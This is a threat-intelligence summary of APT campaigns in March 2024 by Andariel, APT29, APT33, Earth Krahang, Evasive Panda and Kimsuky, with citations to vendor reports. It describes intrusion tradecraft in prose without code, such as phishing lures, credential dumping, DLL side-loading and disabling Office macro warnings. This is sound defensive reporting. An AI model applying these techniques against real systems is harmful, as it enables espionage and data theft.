The cases of major APT groups for March 2024 gathered from materials made public by security companies and institutions are as follows.

 

1)   Andariel

 

ASEC announced that the Andariel group is launching attacks using IMON Client and NetClient (Korean asset management solutions).[1] The group used self-developed malware strains such as AndarLoader, Andardoor, and ModeLoader, as well as MeshAgent (remote control program).

 

2)   APT29

 

Mandiant shared information on the WineLoader malware that the APT29 group (with ties to the Russian foreign intelligence bureau SVR) used to attack German political organizations.[2] This malware strain is linked to the cyber espionage activities of the SpikeWine group discovered by Zscaler’s ThreatLabz.[3] 

The threat actor sent a PDF file disguised as an invitation to a fake wine tasting event, impersonating the ambassador of India. The PDF contained a link to a survey redirecting users to a site that infects their systems with malware. Clicking the link led to a ZIP file containing an HTA file being downloaded, which executes the WineLoader malware. 

WineLoader was first observed in January 2024 and has common traits with other malware strains used by APT29. The malware uses the DLL side-loading technique and RC4 encryption to conduct encrypted communication with the C2 server.

 

3)   APT33 (Curious Serpens)

 

Palo Alto Network Unit 42 shared details of analysis on the FalseFont backdoor used by the APT33 (Curious Serpens and Peach Sandstorm) group which is believed to have ties to Iran.[4] This group impersonated the human resource management software and attacked job seekers in the space aviation and defense industries. 

FalseFont backdoor supports commands such as running processes, downloading and uploading files, manipulating file systems, updating, stealing credentials, and capturing screenshots. It also uses HTTP requests and the SignalR client to communicate with the C&C server via an encrypted channel.

 

4)   Earth Krahang

 

Trend Micro[5] and CheckPoint[6] released information on Earth Krahang, which has been targeting government organizations worldwide since early 2022. [7] It is launching attacks against 45 countries worldwide and is expanding to include the education and communication industries as attack targets. 

The group used various tactics including exploiting vulnerabilities, spear phishing, and brute forcing attacks to gain initial access. After gaining access, the threat actor installs a VPN server and maintains persistence through the registration to the task scheduler. They then use tools such as Mimikatz to dump credentials and run WMIC, as well as various exploits to escalate privilege and perform lateral movement. Earth Krahang abused the infected government infrastructures to host the malware strains and send spear phishing emails. 

The malware strains it used include Cobalt Strike, RESHELL, XDealer (DinodasRAT), and Linodas. Linodas is the Linux version of XDealer (DinodasRAT). 

Earth Krahang is partially related to Earth Lusca and the Chinese company I-Soon.

 

5)   Evasive Panda

 

Eset discovered a supply chain attack by the Evasive Panda group which began in September 2023, targeting Tibetans. Watering hole attacks and modified Tibetan language translation software were used for the attack. 

The attack targeted users who visited the website of the Tibet Monlam festival (held from January to February 2024 in India). It also involved the distribution of Windows and macOS installers including malware through a software developer’s supply chain. 

The threat actor distributed malicious Windows and macOS downloaders to infect targets with the malware strains MgBot and Nightdoor.

 

6)   Kimsuky

 

QianXin Threat Intelligence Center discovered a malware strain used by the Kimsuky group disguised as a software product installer for SGA, a Korean software producer.[8] The sample created an actual installer package to deceive the user while executing the TrollAgent malware packed with VMProtect. TrollAgent supports commands such as execution, file manipulation, and looking up system information. Moreover, it creates UIDs to distinguish victims and has a self-deletion feature. 

ASEC identified a case of the Kimsuky group distributing a malware strain while impersonating a Korean public organization.[9] The attack involved the use of a dropper made to look like the installer for a certain public organization. This dropper created Endoor, a backdoor that was used in past attacks involving TrollAgent that invokes infection during the process of installing security software. This dropper was signed with a valid certificate from a Korean company. It contains a password-protected compressed file and a WinRAR tool to create a backdoor after decompressing the file using a password. The Endoor backdoor was developed in the Go language, capable of stealing information from the infected system and supporting various commands. This backdoor was also used alongside Nikidoor, which was distributed via spear phishing attacks in the past. The threat actor used the backdoor to perform malicious behaviors including downloading additional malware strains or exfiltrating screenshots. 

The Kimsuky group was observed making attempts to steal information regarding the Naver Whale browser.[10] The attack process began with using phishing emails to distribute a RAR (compressed) file containing an HTML file. When the HTML file is opened, it executes a VB script which downloads an additional malware strain from a remote server. The threat actor used a PowerShell script to load and execute additional scripts for information theft. During the attack element analysis, it was revealed that scripts for the following actions were included: system information collection, data encryption, distribution to a remote server, and remote code execution. 

Rapid7 Labs detected cyber espionage activities of the Kimsuky group.[11] The recently observed campaign involved the use of CHM (compiled HTML help file) files to deliver the malicious payload. These CHM files contain an internal HTML page. Some of these execute arbitrary commands in Windows devices using ActiveX. 

Securonix disclosed the DEEP#GOSU campaign believed to be organized by the North Korean group Kimsuky.[12] The attacks begin with the distribution of a malicious LNK file disguised as a PDF file. The attachment contains a PowerShell script that simultaneously extracts and executes the PDF content and downloads an additional malicious payload from Dropbox. The initial payload searches the remote PowerShell script from Dropbox which in turn dynamically loads and executes a .NET assembly from a different Dropbox URL. The file downloaded from Dropbox is TutClient, a remote control malware strain in C#. It uses a PowerShell script to capture the victim’s system information including running processes, firewall status, anti-malware products, and user profile directories. The collected data is encrypted and exfiltrated via Dropbox using HTTP POST requests. 

Kroll cyber threat intelligence team identified the Kimsuky group exploiting the ScreenConnect vulnerabilities (CVE-2024-1708 and CVE-2024-1709) to infect systems with BabyShark.[13] 

The malware, executed through MSHTA, has a different hash every time it is downloaded due to a powerful obfuscation technique. The next stage of downloading included three features: configuring registry keys, exfiltrating information, and executing scheduled tasks. This malware strain edited a registry key so that untrusted macros could be executed without alerts in MS Office. The information exfiltration feature included capturing system information, network details, and security software information.

---

[1] https://asec.ahnlab.com/en/63192/

[2] https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties

[3] https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader

[4] https://unit42.paloaltonetworks.com/curious-serpens-falsefont-backdoor/

[5] https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html

[6] https://research.checkpoint.com/2024/29676/

[7] https://www.welivesecurity.com/en/eset-research/evasive-panda-leverages-monlam-festival-target-tibetans/

[8] https://ti.qianxin.com/blog/articles/Espionage-Operation-Disguised-as-Software-Installers-by-Kimsuky-APT-Q-2-EN/

[9] https://asec.ahnlab.com/en/63396/

[10] https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247495843&idx=1&sn=7965885f6dc8503c7fc49b7002816d13

[11] https://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/

[12] https://www.securonix.com/blog/securonix-threat-research-security-advisory-new-deepgosu-attack-campaign/

[13] https://www.kroll.com/en/insights/publications/cyber/screenconnect-vulnerability-exploited-to-deploy-babyshark